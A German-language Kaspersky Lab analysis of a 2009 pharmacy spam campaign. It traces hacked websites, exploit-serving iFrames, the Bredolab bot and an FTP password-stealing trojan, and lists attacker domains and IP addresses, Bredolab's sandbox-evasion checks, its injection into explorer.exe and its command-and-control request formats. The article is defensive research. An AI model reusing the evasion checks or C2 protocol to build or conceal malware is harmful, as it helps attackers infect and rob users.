Aktuelle Gefahr Spambots: Wie die Malware-Industrie mit Botnetzen bares Geld macht

Einführung

Dieser Hintergrundartikel befasst sich mit den Ergebnissen, die aus der Analyse einer speziellen Spam-Nachricht gewonnen wurden. Dabei entdeckten die Kaspersky-Experten aktuelle Betrugsmethoden von Cyberkriminellen, unter anderem um illegale Botnetze aufzubauen oder Spam-Mitteilungen zu versenden. Die analysierte Vorgehensweise weist eindeutig kriminellen Charakter auf und dient einzig und allein der Bereicherung der Cyberbetrüger.

Spam

Erst vor kurzem wurden in der Content-Filtering-Abteilung bei Kaspersky Lab E-Mails entdeckt, die sich auf den ersten Blick durch nichts von gewöhnlichen Spam-Mitteilungen zu unterscheiden schienen. Es handelte sich dabei um weit verbreiteten, standardisierten E-Mail-Spam mit Werbung für Medikamente, bestehend aus einem HTML-Teil und eingebetteten Abbildungen:


Abb. 1: Beispiel für eine Spam-Nachricht, gesendet an webmaster@viruslist.com

Diese Mails unterschieden sich allerdings in einem wesentlichen Merkmal von der üblichen Masse an Spam-Nachrichten: Die Links in den E-Mails verwiesen nicht auf die Internetseiten der Spammer, sondern führten zu legalen Webseiten.

Auch wenn die Domains in den Links von Mail zu Mail variierten, blieb der Pfad auf den Server stets derselbe: „1/2/3/4/buy/html“.

Abb. 2: Quellcode einer E-Mail mit Links zu legalen Internetseiten

Alle Seiten, auf die die Links verwiesen, enthielten eine einzeilige HTML-Datei mit einem Meta-Refresh-Tag. Das Ziel dieses Tags bestand darin, den Anwender auf eine andere Seite umzuleiten, in diesem Fall auf die Webseite eines Internetshops für den Verkauf von Medikamenten. Die Shopseite wurde ebenfalls von den Spammern beworben.

Abb. 3: Quellcode der Webseite, auf der man zu der Spammer-Seite weitergeleitet wurde

Abb. 4: Die Webseite, auf die die Benutzer umgeleitet wurden

Eine der Methoden zur Identifikation von Spam besteht darin, den Domainnamen aus dem Link der Spam-Mail auf eine schwarze Liste zu setzen, so dass alle Werbe-Mails unabhängig vom Text der Spam-Nachricht erkannt werden. In diesem Fall war die Aufspürung der in den Spam-Mails angegebenen Domains jedoch nicht möglich, weil diese zu legalen Internetseiten führten und die Kaspersky-Experten im Content-Filter pro Tag an die zehn neue Domains feststellen. Diese Methode ist unter Spammern schon seit einigen Jahren bekannt, wird aber selten verwendet, da sie mit mehr Kosten verbunden ist als der Ankauf neuer Domains.

Wahrscheinlich wurden die in den E-Mails angegebenen Webseiten von Cyberkriminellen gehackt, um die Anwender auf die Internetseite der Spammer umzuleiten. Unklar dabei ist jedoch, wie es den Betrügern gelungen sein soll, eine so große Anzahl von Internetseiten zu hacken.

Internetseiten

Viele Internetseiten sind mit Standardmethoden nicht zu hacken. Eine Schnellanalyse der gehackten Webressourcen ergab, dass es sich nicht um dieselben Sicherheitslücken handeln konnte; auch wiesen die Internetseiten nicht immer denselben Aufbau auf. Außerdem wurden die meisten der Seiten nur in HTML ohne Scripts erstellt. Das einzige Merkmal, das alle gehackten Seiten gemeinsam hatten, war ein Ordner mit der Datei „buy. html“. Diese Datei enthielt einen HTML-Tag, durch den die Anwender auf die Seite des Online-Medikamenten-Shops der Spammer umgeleitet wurden.

Nach einer gründlichen Analyse des Inhalts einer der gehackten Webseiten entdeckten die Kaspersky-Analysten allerdings einen äußerst gut getarnten iFrame, der die Benutzer auf die Seite b9g.ru umleitete. Ein verdächtiges Zeichen, denn solche iFrames mit Link zu verdächtigen Seiten werden von Cyberkriminellen häufig zur Infizierung von Computern mit Hilfe von Exploits verwendet.

Abb. 5: Inhalt der gehackten Seite

Die Analyse der Seite b9g.ru zeigte, dass sie aus den folgenden fünf IP-Adressen bestand:

  • 77.37.20.130
  • 90.156.144.78
  • 77.37.19.173
  • 77.37.19.179
  • 77.37.19.205

Nachdem alle Daten zu den Domains mit denselben IP-Adressen gesammelt wurden, entdeckten die Kaspersky-Analysten Domains, deren IP-Adressen für den von den Betrügern eingefügten iFrame angegeben waren: zum Beispiel a3l.ru, b5r.ru, b5z.ru, b7p.ru, b8o.ru, b9g.ru, c6y.ru, c8k.at, f5l.at, f5x.at usw. Der Verdacht, dass es sich hierbei um schädliche iFrames handelte, erhärtete sich.

Exploits

In der nächsten Phase galt es zu klären, was denn genau von der Internetseite http://b9g.ru:****/*****.php auf den Computer der Anwender heruntergeladen wurde. Wie erwartet, wurden beim ersten Besuch der Seite zusammen mit index.php auch Exploits geladen. Cyberkriminelle missbrauchen zahlreiche Sicherheitslücken in den unterschiedlichsten Programmen, wobei PDF-Exploits am gefährlichsten und am erfolgreichsten sind.

Abb. 7: Inhalt von index.php vor und nach erfolgter Entschlüsselung

Bot

Durch das Ausnutzen dieser Sicherheitslücken erfolgten dann der Download und die Installation der auszuführenden Datei Backdoor.Win32.Bredolab. Mit seiner Rootkit-Funktionalität lädt und installiert dieses Schadprogramm weitere Schadenssoftware auf den Computer.

Abb. 8: Teil des Speicherdumps des Rootkit-Downloaders

Der Bot Bredolab versucht seine Ausführung in der Sandbox zu verhindern und überprüft hierzu die folgenden Merkmale:

  • Benutzername − USER, user, CurrentUser, Sandbox
  • Computername − SANDBOX
  • Vorhandensein der VBOX-Zeile im Registry-Key HKLMHARDWAREDescriptionSystemSystemBiosVersion
  • Produkt-ID-Nummer in HKLMMicrosoftWindowsCurrentVersion:
    • 55274-640-2673064-23950 (JoeBox)
    • 76487-644-3177037-23510 (CWSandbox)
    • 76487-337-8429955-22614 (Anubis)

Trifft eine dieser Angaben zu, nimmt das Schadprogramm seinen Betrieb auf.
Bredolab wird auch dann ausgeführt, wenn auf dem infizierten Computer eine COMODO-Firewall installiert ist. In den anderen Fällen kopiert Bredolab sich in die Datei %Temp%~TM27FB4A.TMP, schleust seinen Code in explorer.exe ein, startet dort einen neuen Thread und verschiebt sich in %Temp%~TM%TempName%. Der Bot setzt anschließend seine Arbeit in dem von ihm gestarteten Thread fort und der Initialisierungsprozess wird ausgeführt.

Bei erfolgreicher Verbindung mit dem Command-&-Control-Server des Schädlings sendet der Bot die GET-Anfrage: GET /l/controller.php?action=bot&entity_list={Nummern durch Komma getrennt} &uid=11&first={0|1}&guid={VolumeSerialNumber}&rnd=6293712

Daraufhin übermittelt der Server dem Bot verschlüsselte Daten, die der Bot dann in die neue Datei %Windows%Tempwpv%rand_number%.exe schreiben kann (mit nachfolgendem Start der Datei) oder in den neu erzeugten Prozess svchost.

Abb. 9: Beispiel für eine verschlüsselte Nachricht des Command-&-Control-Servers

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Jul 2009 17:08:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 55709
Entity-Info: 1241530597:32768:1;1246898982:22941:2;
Rnd: 982101
Magic-Number:
32|1|187:55:66:132:143:54:243:114:97:146:132:5:192
:141:199:113:160:130:101:167:50:61:32:107:127:128:84:144:169:61:158:100:…

Antwort des Command-&-Control-Servers. Der Schlüssel zur Dekodierung ist im Magic-Number-Feld enthalten

Im Verlauf der Aktivitäten meldet sich der Bot beim Botnet-Besitzer mit der folgenden GET-Anfrage: GET /l/controller.php?action=report&guid=0&rnd=6293712&uid=11&
entity={Zahl:unique_start|unique_failed|repeat_start|repeat_failed;Zahl:…}

Trojaner als Passwort-Diebe

Ist das Botprogramm mit dem Command-&-Control-Server verbunden, wird das Schadprogramm Trojan-PSW.Win32.Agent.mzh auf das infizierte System herunter geladen und installiert. Dieses Programm stiehlt dann Passwörter für den Zugang auf FTP-Clients.

Abb. 10: Entschlüsselter Code des Trojaners für den Diebstahl von FTP-Passwörtern

Die gestohlenen FTP-Passwörter wurden von den Betrügern an folgende Adresse versendet:

Abb. 11: Daten des Servers, an den die gestohlenen FTP-Passwörter gesendet wurden

Schlussendlich erhielten die Kaspersky-Experten eine Erklärung für die Funktion der gehackten Internetseiten. Die Online-Betrüger hatten nicht versucht, eine große Anzahl von Internetseiten mit Hilfe einer SQL-Injection oder Exploits für das Content-Management-System zu hacken, sondern stahlen einfach die Passwörter zu den FTP-Clients, um so den Inhalt der Seiten zu manipulieren.

In Beschreibungen des Trojaners Trojan-PSW.Win32.Agent.mzh in einschlägigen Hackerforen war zu lesen, dass er zu einem System für den Diebstahl von Passwörtern gehört. Das System wurde für 2.000 US-Dollar zum Kauf angeboten.

Download anderer Schadprogramme

Nach einer Woche gab die Kommandozentrale des Botnetzes den Befehl zum Download von Bots, unter anderem die gefährlichen Exemplare Rustock (Backdoor.Win32.HareBot) und Pushdo (Backdoor.Win32.NewRest.aq). Wieder eine Woche später wurden auf den infizierten Computern ein Schadprogramm der Koobface-Familie sowie ein falsches Antiviren-Programm installiert.

Das Angriffsschema

Die Kaspersky-Analyse, der ursprünglichen Spam-Mail, ergab folgende Vorgehensweise der Cyberkriminellen:

Abb. 12: Funktionsweise des Systems zum Hacken von Internetseiten und Versenden von Spam-Nachrichten

Dieses Schema zeigt die Abläufe und Methoden, die die Betrüger zur Erstellung von Botnetzen und zur Vorbereitung von Spam-Versendung verwenden:

  1. Hacken legaler Ressourcen
  2. Verlinkung auf gehackte Internetseiten, die den Benutzer auf die Seiten der Spammer umleiten
  3. Platzierung von Links auf den gehackten Seiten, die zu Exploits führen
  4. Erstellung eines Botnetzes aus Rechner, die beim Besuch der gehackten Webseiten infiziert wurden.
  5. Diebstahl von Passwörtern
  6. Download verschiedener Schadprogramme sowie von Spambots zur Versendung von Spam

Diese Vorgehensweise ermöglicht es Cyberkriminellen, einen reibungslosen Ablauf zu organisieren, der sich im Idealfall zyklisch wiederholen lässt.

Fazit

Die Versendung von Spam-Mails mit Links zu gehackten oder infizierten Webseiten ist in der Cybercrime-Szene sehr beliebt, weil sich dadurch die illegalen Einnahmen effektiv erhöhen lassen. Stündlich entdecken Kaspersky-Experten zahlreiche neue Adressen oder Domains, mit denen sich das hier aufgezeigte Betrugsverfahren durchführen lässt. Ein weiteres Beispiel zeigen die folgenden Abbildungen:

Abb. 13: Beispiel für eine Spam-Mail mit Link zu einer gehackten Seite

Abb. 14: Quellcode des HTML-Teils der Mail

Der Link (http://…/1.html) im Beispiel oben führt auf die Seite der gehackten Webseite, die den Tag enthält, der den Benutzer auf die Seite mit dem Online-Shop für Medikamente umleitet. Die Spammer verwenden dieses Prinzip in zahlreichen Spam-Mails. Sie verändern immer wieder die Namen der Umleitungsseiten und platzieren über iFrame andere Exploits, doch das Prinzip dabei bleibt dasselbe.

Ein abschließendes Beispiel aus dem Juli 2009 soll nochmals die hier vorgestellte Betrugsmethode illustrieren. Damals wurde gemeldet, dass die beliebte Torrent-Suchmaschine Torrentreactor gehackt worden sei. Die Art, wie die Tags eingesetzt wurden, die die Anwender auf Webseiten mit Exploits führten, ließ erkennen, dass zum Hacken ein Schadprogramm zum Diebstahl von FTP-Passwörtern verwendet worden war. Die Folge: Manipulation einer legalen Seite und die anschließende Verlinkung auf eine „verseuchte“ Seite.

Abb. 15: Ausschnitt aus der gehackten Seite Torrentreactor.net (Screenshot von http://securitylabs.websense.com/content/Assets/AlertMedia/Torrenreactor1_alert.jpg)

Der Artikel und Zitate daraus dürfen unter Nennung des Unternehmens Kaspersky Lab sowie des Autors frei veröffentlicht werden.

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.